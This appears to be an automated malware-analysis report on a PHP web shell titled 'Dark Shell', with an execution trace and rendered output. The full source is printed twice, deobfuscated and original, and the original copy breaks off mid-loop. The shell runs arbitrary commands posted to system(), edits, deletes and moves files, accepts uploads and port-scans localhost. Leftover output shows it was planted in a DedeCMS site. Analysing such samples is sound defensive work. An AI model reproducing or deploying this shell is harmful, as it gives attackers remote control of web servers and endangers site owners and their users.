PHP Malware Analysis

1.php

md5: e0c9c52563cb6a44c9eca041533cbc97

Jump to:

Screenshot


Attributes

Environment

Execution

Files

Input


Deobfuscated PHP code

<html>
<head>
<title>

</title>
</head>
<body>
<style type="text/css">
body{
background: #E4E4E4;
color: #666666;
font-family: Verdana;
font-size: 11px;
}
a:link{
color: #33CC99;
}
a:visited{
color: #33CC99;
}
a:hover{
text-decoration: none;
Color: #3399FF;
}
table {
font-size: 11px;
}
</style>
<?php 
error_reporting(0);
set_time_limit(0);
if (empty($_GET['dir'])) {
    $dir = getcwd();
} else {
    $dir = $_GET['dir'];
}
chdir($dir);
$current = htmlentities($_SERVER['PHP_SELF'] . "?dir=" . $dir);
echo "<center><h1>Dark Shell</h1></center><p><hr><p>\n";
echo "<i>Server: " . $_SERVER['SERVER_NAME'] . "<br>\n";
echo "Current directory: " . getcwd() . "<br>\n";
echo "Software: " . $_SERVER['SERVER_SOFTWARE'] . "<pre>\n\n</pre></i>\n";
echo "<pre>\n\n\n</pre>";
echo "<table width = 50%>";
echo "<tr>";
echo "<td><a href = '" . $current . "&mode=system'>Shell Command</a></td>\n";
echo "<td><a href = '" . $current . "&mode=create'>Create a new file</a></td>\n";
echo "<td><a href = '" . $current . "&mode=upload'>Upload file</a></td>\n";
echo "<td><a href = '" . $current . "&mode=port_scan'>Port Scan</a></td>\n";
echo "</tr></table>";
echo "<pre>\n\n</pre>";
$mode = $_GET['mode'];
switch ($mode) {
    case 'edit':
        $file = $_GET['file'];
        $new = $_POST['new'];
        if (empty($new)) {
            $fp = fopen($file, "r");
            $file_cont = fread($fp, filesize($file));
            $file_cont = str_replace("<textarea>", "<textarea>", $file_cont);
            echo "<form action = '" . $current . "&mode=edit&file=" . $file . "' method = 'POST'>\n";
            echo "File: " . $file . "<br>\n";
            echo "<textarea name = 'new' rows = '30' cols = '50'>" . $file_cont . "<textarea><br>\n";
            echo "<input type = 'submit' value = 'Edit'></form>\n";
        } else {
            $fp = fopen($file, "w");
            if (fwrite($fp, $new)) {
                echo $file . " edited.<p>";
            } else {
                echo "Unable to edit " . $file . ".<p>";
            }
        }
        fclose($fp);
        break;
    case 'delete':
        $file = $_GET['file'];
        if (unlink($file)) {
            echo $file . " deleted successfully.<p>";
        } else {
            echo "Unable to delete " . $file . ".<p>";
        }
        break;
    case 'copy':
        $src = $_GET['src'];
        $dst = $_POST['dst'];
        if (empty($dst)) {
            echo "<form action = '" . $current . "&mode=copy&src=" . $src . "' method = 'POST'>\n";
            echo "Destination: <input name = 'dst'><br>\n";
            echo "<input type = 'submit' value = 'Copy'></form>\n";
        } else {
            if (copy($src, $dst)) {
                echo "File copied successfully.<p>\n";
            } else {
                echo "Unable to copy " . $src . ".<p>\n";
            }
        }
        break;
    case 'move':
        $src = $_GET['src'];
        $dst = $_POST['dst'];
        if (empty($dst)) {
            echo "<form action = '" . $current . "&mode=move&src=" . $src . "' method = 'POST'>\n";
            echo "Destination: <input name = 'dst'><br>\n";
            echo "<input type = 'submit' value = 'Move'></form>\n";
        } else {
            if (rename($src, $dst)) {
                echo "File moved successfully.<p>\n";
            } else {
                echo "Unable to move " . $src . ".<p>\n";
            }
        }
        break;
    case 'rename':
        $old = $_GET['old'];
        $new = $_POST['new'];
        if (empty($new)) {
            echo "<form action = '" . $current . "&mode=rename&old=" . $old . "' method = 'POST'>\n";
            echo "New name: <input name = 'new'><br>\n";
            echo "<input type = 'submit' value = 'Rename'></form>\n";
        } else {
            if (rename($old, $new)) {
                echo "File/Directory renamed successfully.<p>\n";
            } else {
                echo "Unable to rename " . $old . ".<p>\n";
            }
        }
        break;
    case 'rmdir':
        $rm = $_GET['rm'];
        if (rmdir($rm)) {
            echo "Directory removed successfully.<p>\n";
        } else {
            echo "Unable to remove " . $rm . ".<p>\n";
        }
        break;
    case 'system':
        $cmd = $_POST['cmd'];
        if (empty($cmd)) {
            echo "<form action = '" . $current . "&mode=system' method = 'POST'>\n";
            echo "Shell Command: <input name = 'cmd'>\n";
            echo "<input type = 'submit' value = 'Run'></form><p>\n";
        } else {
            system($cmd);
        }
        break;
    case 'create':
        $new = $_POST['new'];
        if (empty($new)) {
            echo "<form action = '" . $current . "&mode=create' method = 'POST'>\n";
            echo "<tr><td>New file: <input name = 'new'></td>\n";
            echo "<td><input type = 'submit' value = 'Create'></td></tr></form>\n<p>";
        } else {
            if ($fp = fopen($new, "w")) {
                echo "File created successfully.<p>\n";
            } else {
                echo "Unable to create " . $file . ".<p>\n";
            }
            fclose($fp);
        }
        break;
    case 'upload':
        $temp = $_FILES['upload_file']['tmp_name'];
        $file = basename($_FILES['upload_file']['name']);
        if (empty($file)) {
            echo "<form action = '" . $current . "&mode=upload' method = 'POST' ENCTYPE='multipart/form-data'>\n";
            echo "Local file: <input type = 'file' name = 'upload_file'>\n";
            echo "<input type = 'submit' value = 'Upload'>\n";
            echo "</form>\n<pre>\n\n</pre>";
        } else {
            if (move_uploaded_file($temp, $file)) {
                echo "File uploaded successfully.<p>\n";
                unlink($temp);
            } else {
                echo "Unable to upload " . $file . ".<p>\n";
            }
        }
        break;
    case 'port_scan':
        $port_range = $_POST['port_range'];
        if (empty($port_range)) {
            echo "<table><form action = '" . $current . "&mode=port_scan' method = 'POST'>";
            echo "<tr><td><input type = 'text' name = 'port_range'></td><td>";
            echo "Enter port range where you want to do port scan (ex.: 0:65535)</td></tr>";
            echo "<tr><td><input type = 'submit' value = 'Port Scan'></td></tr></form></table>";
        } else {
            $range = explode(":", $port_range);
            if (!is_numeric($range[0]) or !is_numeric($range[1])) {
                echo "Bad parameters.<br>";
            } else {
                $host = 'localhost';
                $from = $range[0];
                $to = $range[1];
                echo "Open ports:<br>";
                while ($from <= $to) {
                    $var = 0;
                    $fp = fsockopen($host, $from) or $var = 1;
                    if (false) {
                        echo $from . "<br>";
                    }
                    $from++;
                    fclose($fp);
                }
            }
        }
        break;
}
clearstatcache();
echo "<pre>\n\n</pre>";
echo "<table width = 100%>\n";
$files = scandir($dir);
foreach ($files as $file) {
    if (is_file($file)) {
        $size = round(filesize($file) / 1024, 2);
        echo "<tr><td>" . $file . "</td>";
        echo "<td>" . $size . " KB</td>";
        echo "<td><a href = " . $current . "&mode=edit&file=" . $file . ">Edit</a></td>\n";
        echo "<td><a href = " . $current . "&mode=delete&file=" . $file . ">Delete</a></td>\n";
        echo "<td><a href = " . $current . "&mode=copy&src=" . $file . ">Copy</a></td>\n";
        echo "<td><a href = " . $current . "&mode=move&src=" . $file . ">Move</a></td>\n";
        echo "<td><a href = " . $current . "&mode=rename&old=" . $file . ">Remame</a></td></tr>\n";
    } else {
        $items = scandir($file);
        $items_num = count($items) - 2;
        echo "<tr><td>" . $file . "</td>";
        echo "<td>" . $items_num . " Items</td>";
        echo "<td><a href = " . $current . "/" . $file . ">Change directory</a></td>\n";
        echo "<td><a href = " . $current . "&mode=rmdir&rm=" . $file . ">Remove directory</a></td>\n";
        echo "<td><a href = " . $current . "&mode=rename&old=" . $file . ">Rename directory</a></td></tr>\n";
    }
}
echo "</table>\n";
?><textarea><br>
<input type = 'submit' value = 'Edit'></form>
<pre>

</pre><table width = 100%>
<tr><td>.</td><td>3 Items</td><td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task/.>Change directory</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rmdir&rm=.>Remove directory</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rename&old=.>Rename directory</a></td></tr>
<tr><td>..</td><td>40 Items</td><td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task/..>Change directory</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rmdir&rm=..>Remove directory</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rename&old=..>Rename directory</a></td></tr>
<tr><td>dede-maketimehtml.php</td><td>0.23 KB</td><td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=edit&file=dede-maketimehtml.php>Edit</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=delete&file=dede-maketimehtml.php>Delete</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=copy&src=dede-maketimehtml.php>Copy</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=move&src=dede-maketimehtml.php>Move</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rename&old=dede-maketimehtml.php>Remame</a></td></tr>
<tr><td>dede-maketimehtmls.php</td><td>6.58 KB</td><td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=edit&file=dede-maketimehtmls.php>Edit</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=delete&file=dede-maketimehtmls.php>Delete</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=copy&src=dede-maketimehtmls.php>Copy</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=move&src=dede-maketimehtmls.php>Move</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rename&old=dede-maketimehtmls.php>Remame</a></td></tr>
<tr><td>dede-optimize-table.php</td><td>0.24 KB</td><td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=edit&file=dede-optimize-table.php>Edit</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=delete&file=dede-optimize-table.php>Delete</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=copy&src=dede-optimize-table.php>Copy</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=move&src=dede-optimize-table.php>Move</a></td>
<td><a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&mode=rename&old=dede-optimize-table.php>Remame</a></td></tr>
</table>

Execution traces

data/traces/e0c9c52563cb6a44c9eca041533cbc97_trace-1676255233.6491.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:27:39.546961]
1	0	1	0.000150	393464
1	3	0	0.000411	438264	{main}	1		/var/www/html/uploads/1.php	0	0
2	4	0	0.000429	438264	error_reporting	0		/var/www/html/uploads/1.php	30	1	0
2	4	1	0.000444	438304
2	4	R			22527
2	5	0	0.000458	438264	set_time_limit	0		/var/www/html/uploads/1.php	31	1	0
2	5	1	0.000473	438328
2	5	R			FALSE
2	6	0	0.000488	438296	getcwd	0		/var/www/html/uploads/1.php	33	0
2	6	1	0.000501	438344
2	6	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/1.php	33	$dir = '/var/www/html/uploads'
2	7	0	0.000529	438344	chdir	0		/var/www/html/uploads/1.php	38	1	'/var/www/html/uploads'
2	7	1	0.000544	438432
2	7	R			TRUE
2	8	0	0.000558	438472	htmlentities	0		/var/www/html/uploads/1.php	39	1	'/uploads/1.php?dir=/var/www/html/uploads'
2	8	1	0.000574	438664
2	8	R			'/uploads/1.php?dir=/var/www/html/uploads'
1		A						/var/www/html/uploads/1.php	39	$current = '/uploads/1.php?dir=/var/www/html/uploads'
2	9	0	0.000603	438552	getcwd	0		/var/www/html/uploads/1.php	43	0
2	9	1	0.000615	438600
2	9	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/1.php	58	$mode = NULL
2	10	0	0.000645	438552	clearstatcache	0		/var/www/html/uploads/1.php	235	0
2	10	1	0.000657	438552
2	10	R			NULL
2	11	0	0.000670	438552	scandir	0		/var/www/html/uploads/1.php	239	1	'/var/www/html/uploads'
2	11	1	0.000701	439168
2	11	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => '1.php', 4 => 'data', 5 => 'prepend.php']
1		A						/var/www/html/uploads/1.php	239	$files = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => '1.php', 4 => 'data', 5 => 'prepend.php']
2	12	0	0.000739	439136	is_file	0		/var/www/html/uploads/1.php	241	1	'.'
2	12	1	0.000754	439184
2	12	R			FALSE
2	13	0	0.000767	439144	scandir	0		/var/www/html/uploads/1.php	253	1	'.'
2	13	1	0.000789	439760
2	13	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => '1.php', 4 => 'data', 5 => 'prepend.php']
1		A						/var/www/html/uploads/1.php	253	$items = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => '1.php', 4 => 'data', 5 => 'prepend.php']
1		A						/var/www/html/uploads/1.php	254	$items_num = 4
2	14	0	0.000836	439728	is_file	0		/var/www/html/uploads/1.php	241	1	'..'
2	14	1	0.000851	439768
2	14	R			FALSE
2	15	0	0.000864	439728	scandir	0		/var/www/html/uploads/1.php	253	1	'..'
2	15	1	0.000888	440232
2	15	R			[0 => '.', 1 => '..', 2 => 'uploads']
1		A						/var/www/html/uploads/1.php	253	$items = [0 => '.', 1 => '..', 2 => 'uploads']
1		A						/var/www/html/uploads/1.php	254	$items_num = 1
2	16	0	0.000950	439616	is_file	0		/var/www/html/uploads/1.php	241	1	'.htaccess'
2	16	1	0.000966	439664
2	16	R			TRUE
2	17	0	0.000979	439624	filesize	0		/var/www/html/uploads/1.php	243	1	'.htaccess'
2	17	1	0.000992	439664
2	17	R			64
2	18	0	0.001005	439624	round	0		/var/www/html/uploads/1.php	243	2	0.0625	2
2	18	1	0.001019	439696
2	18	R			0.06
1		A						/var/www/html/uploads/1.php	243	$size = 0.06
2	19	0	0.001046	439624	is_file	0		/var/www/html/uploads/1.php	241	1	'1.php'
2	19	1	0.001060	439656
2	19	R			TRUE
2	20	0	0.001073	439616	filesize	0		/var/www/html/uploads/1.php	243	1	'1.php'
2	20	1	0.001085	439656
2	20	R			9903
2	21	0	0.001098	439616	round	0		/var/www/html/uploads/1.php	243	2	9.6708984375	2
2	21	1	0.001110	439688
2	21	R			9.67
1		A						/var/www/html/uploads/1.php	243	$size = 9.67
2	22	0	0.001136	439616	is_file	0		/var/www/html/uploads/1.php	241	1	'data'
2	22	1	0.001150	439656
2	22	R			FALSE
2	23	0	0.001163	439616	scandir	0		/var/www/html/uploads/1.php	253	1	'data'
2	23	1	0.001186	440144
2	23	R			[0 => '.', 1 => '..', 2 => 'trace-1676255233.6491.xt.gz']
1		A						/var/www/html/uploads/1.php	253	$items = [0 => '.', 1 => '..', 2 => 'trace-1676255233.6491.xt.gz']
1		A						/var/www/html/uploads/1.php	254	$items_num = 1
2	24	0	0.001230	439640	is_file	0		/var/www/html/uploads/1.php	241	1	'prepend.php'
2	24	1	0.001245	439688
2	24	R			TRUE
2	25	0	0.001257	439648	filesize	0		/var/www/html/uploads/1.php	243	1	'prepend.php'
2	25	1	0.001270	439688
2	25	R			57
2	26	0	0.001283	439648	round	0		/var/www/html/uploads/1.php	243	2	0.0556640625	2
2	26	1	0.001302	439720
2	26	R			0.06
1		A						/var/www/html/uploads/1.php	243	$size = 0.06
1	3	1	0.001334	439760
			0.001362	315752
TRACE END   [2023-02-13 00:27:39.548205]


Generated HTML code

<html><head>
<title>

</title>
</head>
<body>
<style type="text/css">
body{
background: #E4E4E4;
color: #666666;
font-family: Verdana;
font-size: 11px;
}
a:link{
color: #33CC99;
}
a:visited{
color: #33CC99;
}
a:hover{
text-decoration: none;
Color: #3399FF;
}
table {
font-size: 11px;
}
</style>
<center><h1>Dark Shell</h1></center><p></p><hr><p>
<i>Server: localhost<br>
Current directory: /var/www/html<br>
Software: Apache/2.4.52 (Ubuntu)</i></p><pre><i>
</i></pre>
<pre>

</pre><table width="50%"><tbody><tr><td><a href="/1.php?dir=/var/www/html&amp;mode=system">Shell Command</a></td>
<td><a href="/1.php?dir=/var/www/html&amp;mode=create">Create a new file</a></td>
<td><a href="/1.php?dir=/var/www/html&amp;mode=upload">Upload file</a></td>
<td><a href="/1.php?dir=/var/www/html&amp;mode=port_scan">Port Scan</a></td>
</tr></tbody></table><pre>
</pre><pre>
</pre><table width="100%">
<tbody><tr><td>.</td><td>2 Items</td><td><a href="/1.php?dir=/var/www/html/.">Change directory</a></td>
<td><a href="/1.php?dir=/var/www/html&amp;mode=rmdir&amp;rm=.">Remove directory</a></td>
<td><a href="/1.php?dir=/var/www/html&amp;mode=rename&amp;old=.">Rename directory</a></td></tr>
<tr><td>..</td><td>2 Items</td><td><a href="/1.php?dir=/var/www/html/..">Change directory</a></td>
<td><a href="/1.php?dir=/var/www/html&amp;mode=rmdir&amp;rm=..">Remove directory</a></td>
<td><a href="/1.php?dir=/var/www/html&amp;mode=rename&amp;old=..">Rename directory</a></td></tr>
<tr><td>1.php</td><td>9.67 KB</td><td><a href="/1.php?dir=/var/www/html&amp;mode=edit&amp;file=1.php">Edit</a></td>
<td><a href="/1.php?dir=/var/www/html&amp;mode=delete&amp;file=1.php">Delete</a></td>
<td><a href="/1.php?dir=/var/www/html&amp;mode=copy&amp;src=1.php">Copy</a></td>
<td><a href="/1.php?dir=/var/www/html&amp;mode=move&amp;src=1.php">Move</a></td>
<td><a href="/1.php?dir=/var/www/html&amp;mode=rename&amp;old=1.php">Remame</a></td></tr>
<tr><td>beneri.se_malware_analysis</td><td>0 KB</td><td><a href="/1.php?dir=/var/www/html&amp;mode=edit&amp;file=beneri.se_malware_analysis">Edit</a></td>
<td><a href="/1.php?dir=/var/www/html&amp;mode=delete&amp;file=beneri.se_malware_analysis">Delete</a></td>
<td><a href="/1.php?dir=/var/www/html&amp;mode=copy&amp;src=beneri.se_malware_analysis">Copy</a></td>
<td><a href="/1.php?dir=/var/www/html&amp;mode=move&amp;src=beneri.se_malware_analysis">Move</a></td>
<td><a href="/1.php?dir=/var/www/html&amp;mode=rename&amp;old=beneri.se_malware_analysis">Remame</a></td></tr>
</tbody></table>
<textarea>&lt;br&gt;
&lt;input type = 'submit' value = 'Edit'&gt;&lt;/form&gt;
&lt;pre&gt;

&lt;/pre&gt;&lt;table width = 100%&gt;
&lt;tr&gt;&lt;td&gt;.&lt;/td&gt;&lt;td&gt;3 Items&lt;/td&gt;&lt;td&gt;&lt;a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task/.&gt;Change directory&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&amp;mode=rmdir&amp;rm=.&gt;Remove directory&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&amp;mode=rename&amp;old=.&gt;Rename directory&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;..&lt;/td&gt;&lt;td&gt;40 Items&lt;/td&gt;&lt;td&gt;&lt;a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task/..&gt;Change directory&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&amp;mode=rmdir&amp;rm=..&gt;Remove directory&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&amp;mode=rename&amp;old=..&gt;Rename directory&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;dede-maketimehtml.php&lt;/td&gt;&lt;td&gt;0.23 KB&lt;/td&gt;&lt;td&gt;&lt;a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&amp;mode=edit&amp;file=dede-maketimehtml.php&gt;Edit&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&amp;mode=delete&amp;file=dede-maketimehtml.php&gt;Delete&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&amp;mode=copy&amp;src=dede-maketimehtml.php&gt;Copy&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&amp;mode=move&amp;src=dede-maketimehtml.php&gt;Move&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&amp;mode=rename&amp;old=dede-maketimehtml.php&gt;Remame&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;dede-maketimehtmls.php&lt;/td&gt;&lt;td&gt;6.58 KB&lt;/td&gt;&lt;td&gt;&lt;a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&amp;mode=edit&amp;file=dede-maketimehtmls.php&gt;Edit&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&amp;mode=delete&amp;file=dede-maketimehtmls.php&gt;Delete&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&amp;mode=copy&amp;src=dede-maketimehtmls.php&gt;Copy&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&amp;mode=move&amp;src=dede-maketimehtmls.php&gt;Move&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&amp;mode=rename&amp;old=dede-maketimehtmls.php&gt;Remame&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;dede-optimize-table.php&lt;/td&gt;&lt;td&gt;0.24 KB&lt;/td&gt;&lt;td&gt;&lt;a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&amp;mode=edit&amp;file=dede-optimize-table.php&gt;Edit&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&amp;mode=delete&amp;file=dede-optimize-table.php&gt;Delete&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&amp;mode=copy&amp;src=dede-optimize-table.php&gt;Copy&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&amp;mode=move&amp;src=dede-optimize-table.php&gt;Move&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href = /plus/task/dede-maketimehtmls.php?dir=D:\amp\Apache24\htdocs\plus\task&amp;mode=rename&amp;old=dede-optimize-table.php&gt;Remame&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;
</textarea></body></html>

Original PHP code

<html>
<head>
<title>

</title>
</head>
<body>
<style type="text/css">
body{
background: #E4E4E4;
color: #666666;
font-family: Verdana;
font-size: 11px;
}
a:link{
color: #33CC99;
}
a:visited{
color: #33CC99;
}
a:hover{
text-decoration: none;
Color: #3399FF;
}
table {
font-size: 11px;
}
</style>
<?php
error_reporting (0);
set_time_limit (0);
if (empty ($_GET ['dir'])){
$dir = getcwd ();
}
else {
$dir = $_GET ['dir'];
}
chdir ($dir);
$current = htmlentities ($_SERVER ['PHP_SELF'] . "?dir=" . $dir);

echo "<center><h1>Dark Shell</h1></center><p><hr><p>\n";
echo "<i>Server: " . $_SERVER ['SERVER_NAME'] . "<br>\n";
echo "Current directory: " . getcwd () . "<br>\n";
echo "Software: " . $_SERVER ['SERVER_SOFTWARE'] . "<pre>\n\n</pre></i>\n";
echo "<pre>\n\n\n</pre>";

echo "<table width = 50%>";
echo "<tr>";
echo "<td><a href = '".$current."&mode=system'>Shell Command</a></td>\n";
echo "<td><a href = '".$current."&mode=create'>Create a new file</a></td>\n";
echo "<td><a href = '".$current."&mode=upload'>Upload file</a></td>\n";
echo "<td><a href = '".$current."&mode=port_scan'>Port Scan</a></td>\n";
echo "</tr></table>";
echo "<pre>\n\n</pre>";



$mode = $_GET ['mode'];
switch ($mode){
case 'edit':
$file = $_GET ['file'];
$new = $_POST ['new'];
if (empty ($new)){
$fp = fopen ($file, "r");
$file_cont = fread ($fp, filesize ($file));
$file_cont = str_replace ("<textarea>", "<textarea>", $file_cont);
echo "<form action = '".$current."&mode=edit&file=".$file."' method = 'POST'>\n";
echo "File: ". $file . "<br>\n";
echo "<textarea name = 'new' rows = '30' cols = '50'>".$file_cont."<textarea><br>\n";
echo "<input type = 'submit' value = 'Edit'></form>\n";
}
else {
$fp = fopen ($file, "w");
if (fwrite ($fp, $new)){
echo $file . " edited.<p>";
}
else {
echo "Unable to edit " . $file . ".<p>";
}
}
fclose ($fp);
break;
case 'delete':
$file = $_GET ['file'];
if (unlink ($file)){
echo $file . " deleted successfully.<p>";
}
else {
echo "Unable to delete " . $file . ".<p>";
}
break;
case 'copy':
$src = $_GET ['src'];
$dst = $_POST ['dst'];
if (empty ($dst)){
echo "<form action = '".$current . "&mode=copy&src=" . $src . "' method = 'POST'>\n";
echo "Destination: <input name = 'dst'><br>\n";
echo "<input type = 'submit' value = 'Copy'></form>\n";
}
else {
if (copy ($src, $dst)){
echo "File copied successfully.<p>\n";
}
else {
echo "Unable to copy " . $src . ".<p>\n";
}
}
break;
case 'move':
$src = $_GET ['src'];
$dst = $_POST ['dst'];
if (empty ($dst)){
echo "<form action = '".$current . "&mode=move&src=" . $src . "' method = 'POST'>\n";
echo "Destination: <input name = 'dst'><br>\n";
echo "<input type = 'submit' value = 'Move'></form>\n";
}
else {
if (rename ($src, $dst)){
echo "File moved successfully.<p>\n";
}
else {
echo "Unable to move " . $src . ".<p>\n";
}
}
break;
case 'rename':
$old = $_GET ['old'];
$new = $_POST ['new'];
if (empty ($new)){
echo "<form action = '".$current . "&mode=rename&old=" . $old . "' method = 'POST'>\n";
echo "New name: <input name = 'new'><br>\n";
echo "<input type = 'submit' value = 'Rename'></form>\n";
}
else {
if (rename ($old, $new)){
echo "File/Directory renamed successfully.<p>\n";
}
else {
echo "Unable to rename " . $old . ".<p>\n";
}
}
break;

case 'rmdir':
$rm = $_GET ['rm'];
if (rmdir ($rm)){
echo "Directory removed successfully.<p>\n";
}
else {
echo "Unable to remove " . $rm . ".<p>\n";
}
break;
case 'system':
$cmd = $_POST ['cmd'];
if (empty ($cmd)){
echo "<form action = '".$current . "&mode=system' method = 'POST'>\n";
echo "Shell Command: <input name = 'cmd'>\n";
echo "<input type = 'submit' value = 'Run'></form><p>\n";
}
else {
system ($cmd);
}
break;
case 'create':
$new = $_POST ['new'];
if (empty ($new)){
echo "<form action = '".$current . "&mode=create' method = 'POST'>\n";
echo "<tr><td>New file: <input name = 'new'></td>\n";
echo "<td><input type = 'submit' value = 'Create'></td></tr></form>\n<p>";
}
else {
if ($fp = fopen ($new, "w")){
echo "File created successfully.<p>\n";
}
else {
echo "Unable to create ".$file.".<p>\n";
}
fclose ($fp);
}
break;
case 'upload':
$temp = $_FILES['upload_file']['tmp_name'];
$file = basename($_FILES['upload_file']['name']);
if (empty ($file)){
echo "<form action = '".$current . "&mode=upload' method = 'POST' ENCTYPE='multipart/form-data'>\n";
echo "Local file: <input type = 'file' name = 'upload_file'>\n";
echo "<input type = 'submit' value = 'Upload'>\n";
echo "</form>\n<pre>\n\n</pre>";
}
else {
if(move_uploaded_file($temp,$file)){
echo "File uploaded successfully.<p>\n";
unlink ($temp);
}
else {
echo "Unable to upload " . $file . ".<p>\n";
}
}
break;

case 'port_scan':
$port_range = $_POST ['port_range'];
if (empty ($port_range)){
echo "<table><form action = '".$current. "&mode=port_scan' method = 'POST'>";
echo "<tr><td><input type = 'text' name = 'port_range'></td><td>";
echo "Enter port range where you want to do port scan (ex.: 0:65535)</td></tr>";
echo "<tr><td><input type = 'submit' value = 'Port Scan'></td></tr></form></table>";
}
else {
$range = explode (":", $port_range);
if ((!is_numeric ($range [0])) or (!is_numeric ($range [1]))){
echo "Bad parameters.<br>";
}
else {
$host = 'localhost';
$from = $range [0];
$to = $range [1];
echo "Open ports:<br>";
while ($from <= $to){
$var = 0;
$fp = fsockopen ($host, $from) or $var = 1;
if ($var == 0){
echo $from . "<br>";
}
$from++;
fclose ($fp);
}
}
}
break;


}

clearstatcache ();

echo "<pre>\n\n</pre>";
echo "<table width = 100%>\n";
$files = scandir ($dir);
foreach ($files as $file){
if (is_file ($file)){

$size = round (filesize ($file) / 1024, 2);
echo "<tr><td>".$file."</td>";
echo "<td>".$size." KB</td>";
echo "<td><a href = ".$current . "&mode=edit&file=".$file.">Edit</a></td>\n";
echo "<td><a href = ".$current . "&mode=delete&file=".$file.">Delete</a></td>\n";
